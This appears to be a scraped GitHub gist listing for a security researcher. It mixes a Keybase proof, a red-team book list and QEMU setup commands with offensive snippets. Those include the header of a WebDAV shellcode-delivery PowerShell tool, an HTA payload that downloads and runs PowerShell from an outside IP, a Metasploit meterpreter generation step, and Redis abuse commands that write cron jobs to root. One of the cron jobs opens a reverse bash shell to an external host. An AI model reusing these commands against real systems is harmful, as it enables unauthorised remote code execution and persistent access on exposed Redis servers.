View keybase.md

Keybase proof

I hereby claim:

  • I am carnal0wnage on github.
  • I am carnal0wnage (https://keybase.io/carnal0wnage) on keybase.
  • I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo

To claim this, I am signing this object:

View Invoke-WebDavDelivery.ps1
function Invoke-WebDavDelivery
{
<#
.SYNOPSIS
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
View gist:606c41ac6ec40bf5c69d4db96d9312e3
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
View windows10qemu.sh
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:93a9a8fa20acd0d62d0343b438710db8
root@weisuo.org:~# cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
#msfconsole
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
View gist:b5e8ae7a489207c58f54cfaa7b37718d
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
View gist:5a9578a66484435b9685e03a27c9d3fc
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
from https://phpinfo.me/2016/07/07/1275.html
View gist:01963c7a36235e90c11ef8756e76d3d5
redis-cli flushall # for ease of testing
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
View gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html